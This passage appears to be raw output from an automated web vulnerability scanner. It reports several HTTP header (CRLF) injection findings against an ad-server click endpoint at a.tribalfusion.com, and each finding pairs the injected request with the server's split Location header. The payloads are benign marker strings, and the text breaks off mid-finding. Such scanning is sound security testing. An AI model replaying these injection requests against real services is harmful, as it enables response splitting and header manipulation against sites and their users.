Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aknD41tliMZc6Jq3DJejYVRXks2tCoV46o1H7KcnbhQwiABYbOlBQj9KPa7FkpW1GfZdT7va46px2afH3CmbmXngXsZbvZblVuJn6Gt39qhKVWKu4v9qmUWMaZbhmbxgp0UCO1Zd6oM2MACsSqZd8YXgAHe1LoZc2XfZaOiZabJhTTvp70KvnSsi5FOFTlFifnfP9exrF2SZbr0ZceCX4FW4XfU2BBZbubZaTfLl9LUZcrvrRIYoGZcZaLXksDtUOILHZd9lhutIGOyb7aVvZaYcvarWEbhQHVQkaYJr5IZcuumMjGMi1sM74PL77MiCjjCuyECpdWF9JemuxESx9V0dNZcxfL46hIcoZbBkSWYrSGlB4QTMLftqDxHCiU080XNBtjYo9K8nTWs5uWrWjdZa2TaptjD957Bnj9oLBu9tNvuh1xGYBeMfN10UYgvMCZclOAxjDVHEjBkTeSjknhFa4WW6x0lWPK0KGFqZbaOvJjih1ZaLVC6PniNJOrZcIEuMN259cZaMA1rPcvLrOkjyAgdyIMwxVvvQSOx2ULsibj4Zcq28b7NIQDA9xeYEtNWEkZaGtOHwtV; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:11 GMT;
Content-Type: text/html
Location: ;ord=ac0a8
8ed1987295d
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2bc38%0d%0a32afce6163b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/?2bc38%0d%0a32afce6163b=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=arnhU0NZaiLAhj9Isqf9XkEtM2LcGeaAkKcb5As9NcGY9HeynZawANdxZdhEkpAEjSar40EPy8Qg6yOKnw9jcR1E1fIkivOacp4WKZcZdKt9mQvkuxiff0DpPvroLVNxh2P6939LByRZaPIkoqROZauoA37raL05RM0o93YqZaL60WYFw0HNpNmktZc3c0nexcuSZaKeY7RhGXJIkxTSUwwNWrjqiXi1aZcIZa7N2upllyR3GYJmbLjf7Tkusi56FZdepb7KYtau2FsbPCRXhp1ANh9nA4WKmLJ5eVvdgBZad2RZcR8kZcTVgsAGq7jAHMOp2I85YbeSsZcwhpjEdZbZcaFgyVxTZdZdp6ZbZdfxTw8SgQwBRqWEi562H49DiZbZd7os5ppMR1Xdtt8t7HXNGXJyKvK9KHjUIPk2k2IFVZbQZcWm4cZbQUCTqhRCOhvwj1d4KUtJ8cVZas7ClNgQnIhnLLOqpXUwwGGQuAgF7ag8VvOcU9mQk; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:17 GMT;
Content-Type: text/html
Location: ?2bc38
32afce6163b=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/

Issue detail

The value of the ord request parameter is copied into the Location response header. The payload d8e25%0d%0abe3ec6901dd was submitted in the ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=d8e25%0d%0abe3ec6901dd HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aDnhMYrwZaKIxy73BU8i5qdmJo7w957VhZaZcmfFl7CuZbDkYG4YeOuqFboFfZbMGa3QQUgIByPZbZa9R52bxbbXjjVNy5GEJiiJPZcrIx7Zd80bqsZclLoutubvZbGYV0diXuQyKlHHSZdu5y4CQSa2d2qZb7oVevWRbmKeUEeJlxyT9GegCZaqWCv8ZctBEibZaZbLj0xeFbYNBfpjZaZcgx4YFBj3YQZbXtgtDZbCu7qvWea0Qw75gK8i0gZbg4HkATITh1HrjZcNwCgZcSJ2goaZaOoZamQrRjAIoyDZddkYnTGauC7tgRGwQjZcfBtZbQZb4aRrwKyPxRVt8aVOPe7Eb1xFtnGjRKjahTOSjSDJgOi5whpWhVbyPpbqpdu5mwZdeZbCTQA4JDnnCpwlM1auZbfc8vV4rt7653w8avuCalZdqWRbUDHIKaSk51Mqpk1XhVsRZcGUF8JnmWvHNC02n4B3qeZanDO8PrKJQqatqjMoZdBf2BKaZb; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:06 GMT;
Content-Type: text/html
Location: ;ord=d8e25
be3ec6901dd
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ebaaf%0d%0a08b66f30576 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ebaaf%0d%0a08b66f30576/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aEnh31RZdybIhTCFC3l82sIZdmRHKrYfmPW94PHVpJpHFiyZapFphLCHWXL1UmUW5lC195ji5Zc5HZaA5pxsNZdlwpSAP2GhvKP0eSZdQcsGjpgNShKCmcPiqHMnxTGn7tJJsQhfabn2Gkb9tE1Vw4soOCeXn5ERcUoFuieqVixMKw83tBlQWAwW5X9pgSOix8uCf0VV51f4skKBuV4y0TCTyZctgjOXaOod9Cknoxl1hXYhcIepQcFSi97eDHZc2p1kLXjj490L5e6pelywx6qDYCFo9uXlyFkgBM4B8hKcg4XevxYgqvHZbbif3JJHwKVkD2tt9GkTeoHpHmceBFZao4I6yRM0ZcZdLLneXmB6yWeqQ2mBChJqjO1L72pVJyYwCciG1OqFwtnUAJpEqaeiK3qBrDQ4hDA1mbCJkZaMHZcNLDF4Za9nmhvLUobVJjeXnu72ZdONen2RuCd6njrl3V0qowXRSn5V0PEZdG02Zbj; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:33 GMT;
Content-Type: text/html
Location: ebaaf
08b66f30576/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 5b6fb%0d%0a147c7cf0d7 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/5b6fb%0d%0a147c7cf0d7/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aXnh31OZb36HOXs3RM1FYJ3w0PdSEAkTMacnIOIZcNPbSw3YyVx5YBZdZcZdCRO5QaBLQxK6AFKfg24u17JPIv9VFnRZbZa7GZaDg07As8qSwZdd8cf4GGcywn5jujUYsXc7kMeF7COM8ZdWA0JbDUZbQefiprsqv56mZcy3spk5JMr72yeGVlee7jvywxbPWuTwZdO7ZdmlxZanGkJGZdQXScL4CCoGZdY1IX6cX0lHeojYjEcbTqMMLf4yJ405ISh32Zd2jklZaOBD4rWKmH6h2OXMyZaYVkn1lqk5dl9CjRKeJmZbu6rf1cuRRBwU3n9Lq4ZbqImjhHvsTx7ctCqNeKIgPUloWpHnZaM0mSU6CMPfd1s6DZbvNDHDgL9ivyUDDE2ZaKFsC0c2txH8sM5ODhIZb18wSGLifxYQtnKYttZaSOZdqQXo5SxnSFw8cZcmvC8A59WCF5LG3nnJD8mZcgrFO24uAXcGEF4jnuVZcYQEtmcjiSQuDZb5; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:49 GMT;
Content-Type: text/html
Location: http:/5b6fb
147c7cf0d7/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 8b8e4%0d%0ae7010146c86 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/8b8e4%0d%0ae7010146c86 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aRnhMYPMEWFyTQBPej8gYGoJirFFjMYe1NZcwiFZdl0rYlxBRNO5gorMEc9T52pcUZaY4LZaZbfQ0dZaTZaYZaObQaoLahKWPJW8u0sp0Yrw8uciZakyB84P2KGQnBVxsqbtEJZdKZdssCvKRV33IeU3rGKjOiOXOxctl6FUOKMDpYWWKc9bCo6ZaMrLDfV2XjbgKCZbqeFZdMFsciQ4x7VpqejGFPwasUk1am752LN600Nsm1n0hZbsVZaZcX54aCtAaZcR9BcDd4Vm3H8QZcJbjTfLe3o9ZbPWi8xFrBNEyTMZbbrrZdiRBaTZb8PHpSbINlEFHGIyVrtkuSh16hZaHf1syMWqF7eBg9jVsunVZclPwZdqDM8kYItCao58N53xH6JNGfOntPhCDG7nrjOUyNKZc1an3M0ZdD2vMSegfAWsgxw8h9PovWhZdZbgBGkJnV1qhq7fiKPTxhObDJcFr52gIpn8rJ6Za8uFRaWuZbLnB5AWa81p; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:26:03 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/8b8e4
e7010146c86
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of the a request parameter is copied into the Location response header. The payload 97bca%0d%0a2b7989845c9 was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=97bca%0d%0a2b7989845c9&vehicle=rogue&dcp=omd.55865628.&dcc=39972439.232434380&dcn=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=amnh31y4ZaZaeh2urRZbsIX35SyymuEXfWkqnnYrbUKZaVUpte4duxZdYUD3ZdPHJrtklbdjYjYB1Y1FZcRMMulntIUKiyGO3tCyiHUKhY4oD6BGA4P9nrZaBUlIUjRGPZakZaCGf9Crrq917x5vOyqYmDhZaR1fqJk24DKcXi0FMOUJkqHZc55JwgUBNlqGtASpwjbuH1ZbxsnGxhSSIZdXF2kvDGgbmhOUSYKuOJh7y92HInxKf37v4LlMMLO1gqiSOjejY5Rgp6994IMNeFwNBZchMlpf3A8jYV9IHZduZcYisTmCPkOvyU1OlZbTpAd7d5dVJRZaMQhjnFrZcv7gHZcS7UPqCgOn14MSvPPwn7j0VXxgNFDEUgHaZdYUFUcSUwwZdqo84fWtbiTfZbSBfDFZcZbenGXnjvQv9dcvrRn2ulP60QH2uQlG3nOIkY9NZbiE3HbxFLI6Zdf9S6ZbhBnvyWjfgL0GUC9lwwZa3J2WuC3yskrWEp; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:38 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=97bca
2b7989845c9&vehicle=rogue&dcp=omd.55865628.&dcc=39972439.232434380&dcn=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of the dcc request parameter is copied into the Location response header. The payload 2b31b%0d%0ade2b2ba9b51 was submitted in the dcc parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=omd.55865628.&dcc=2b31b%0d%0ade2b2ba9b51&dcn=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aSnh31N3IQJNTyoVQTlJvqaIUZbSqlbc8FWWNZbvNDlqY2121ARIrZdb6XLZar3CXFDrL38Vb9CndPQEAmJaTbMQA1UE2J3VAtvDZaQKSYC6ZdCVjdWQWZaZb8kgt25Mb0iF0Qo00Vpf5PPgAyn8MTDMGSkWIuTZaZc7FDRHeroUsZbEI6Ba51KmmEP9XZdGUZa8XNKZd9OsiWTb81s4VKcWvqlmeP01xyoOqLlTtxGoo8XQHmhA8kTBXetKXhFnkEEe4Zc2vWZdFk09R6YeAmjMwHx6NmxfZbx0dAgFLQkM2I6qdZdJdZaWnNkierwrATCLoZdi5tA7yUVfQyhr8D8Xp6rmYVwt4CqXHqR5qi0BF8peIJ70lPFT1i90jPmPljSi4MMq0CSVHhGWQSOpoiZahMMvmT5F5rUiQ5VgsuEERHZc336V8hda7RM3BNiqREtEyRyJYIZblJgAbnvrCbWlYXvgy3mJ6bfce5QZcsp4BcAKj1OW; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:16 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=omd.55865628.&dcc=2b31b
de2b2ba9b51&dcn=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of the dcn request parameter is copied into the Location response header. The payload 4af06%0d%0a498f542876a was submitted in the dcn parameter. This caused a response containing an injected HTTP header.

Request

